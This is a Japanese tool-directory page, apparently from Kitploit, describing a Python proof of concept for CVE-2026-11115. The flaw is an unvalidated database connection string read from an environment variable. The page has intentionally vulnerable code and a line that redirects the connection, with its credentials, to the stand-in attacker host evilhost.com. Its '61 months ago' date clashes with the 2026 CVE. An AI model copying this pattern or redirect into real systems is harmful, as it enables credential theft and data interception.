Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable — CVE-2026-11115 の最小限の Python 概念実証(PoC)。環境変数を介したデータベース接続文字列インジェクションと、攻撃者が制御する PostgreSQL ホストへのリダイレクトを実証します。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable
脆弱性分析エクスプロイトペネトレーションテスト設定ミス学習と教育データベースセキュリティ
GitHubgeorge0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable

CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable

CVE-2026-11115 の最小限の Python 概念実証(PoC)。環境変数を介したデータベース接続文字列インジェクションと、攻撃者が制御する PostgreSQL ホストへのリダイレクトを実証します。

リポジトリを見る
61ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-11115 – 環境変数を介したデータベース接続文字列インジェクション

プログラムコード(Python)

root@kitploit:~
# db_connector.py - Constructs DB connection string from environment
import os, psycopg2

def connect():
    # Reads DB_URL; attacker can override via environment injection if they control an env var
    db_url = os.getenv('DB_URL', 'postgresql://user:pass@localhost/db')
    # Vulnerability: no validation; allows extra parameters like ?application_name=... but also SSRF or auth bypass
    conn = psycopg2.connect(db_url)
    return conn

# Simulate an attacker who can set environment variable:
os.environ['DB_URL'] = "postgresql://user:pass@localhost/db?host=evilhost.com&sslmode=disable"
c = connect()  # Connects to attacker-controlled host!
print("Connected to attacker DB.")

CVE-2026-11115 – データベース接続文字列インジェクション

Severity: High

概要

アプリケーションは、環境変数からデータベース接続文字列を検証なしに構築します。攻撃者がその変数を操作できる場合(たとえば、サーバーサイドリクエストフォージェリやCI/CDパイプラインの設定ミスを介して)、データベース接続を自身のサーバーにリダイレクトし、データを傍受または改ざんできます。

脆弱性の詳細

  • 種類: 接続文字列インジェクション
  • 影響: データ流出、中間者攻撃。
  • 根本原因: 接続URI全体が環境変数から取得され、元のホストを上書きする追加パラメータ(host など)が付加される可能性があるため。

エクスプロイトのデモ

シミュレーションを実行:

root@kitploit:~
pip install psycopg2-binary
python db_connector.py

このプログラムは、localhost ではなく evilhost.com への接続を試みます。

ツールをダウンロード